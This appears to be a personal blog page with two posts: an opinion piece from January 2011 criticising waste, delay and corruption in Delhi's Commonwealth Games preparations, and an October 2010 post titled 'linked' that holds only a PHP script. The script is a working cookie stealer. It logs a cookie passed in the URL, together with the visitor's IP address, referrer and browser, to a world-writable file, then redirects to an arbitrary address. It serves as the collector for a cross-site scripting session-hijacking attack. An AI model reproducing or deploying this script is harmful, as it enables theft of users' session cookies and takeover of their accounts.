Tuesday, January 4, 2011


As everybody knows our national image is hit badly during preparation for the games. Almost every media house is covering minute happening at the village. Unfortunately Little attention has been paid to the other parts of Delhi. No body has paid attention towards the people of Delhi and their sufferings during the preparation. The cooperation extended by Delhi including 30,000 volunteers is still being ignored even after free services.
According to Mr. Mani Shankar 77,000 crores is being spent during this mega event. Do you think that this money can change the image and the looks of Delhi?. if yes,then compare the progress overall Delhi as of now.
Our government actually woke-up late and started work in a hurried manner whether it’s sub standard equipments,purchases of various kinds raw material etc. Red tape played a vital role including every person involved. now comes the blaming policy and shifting the responsibility to other to save your skin from corruption.

who is responsible?

Chairman of OC says he is ready for the inquiry and also states that he deserves the appreciation Award also if not found guilty. he is ready with answers for the future inquiry which he is anticipating. Similarly others are also ready the same way, and we would be fooled again and as the time passes people would forget it and politicians will start-up the new process to convince the masses again. This happens every time in our country. Our attention is always diverted to other issues.

Tuesday, October 12, 2010

linked

$ip = $_SERVER['REMOTE_ADDR'];
$cookie = $_GET['cookie'];
$referer = $_SERVER['HTTP_REFERER'];
$browser = $_SERVER['HTTP_USER_AGENT']; $redirect =
$_GET['redirect'];
$data = "IP: " . $ip . "\n" ."Cookie: " . $cookie . "\n" ."Referrer: " . $referer .
"\n" ."Browser: " . $browser . "\n\n";
$log = "cookies.txt";
@chmod($log, 0777);
$f = fopen($log, 'a');
fwrite($f, $data); fclose($f);
@header("Location: $redirect");
?>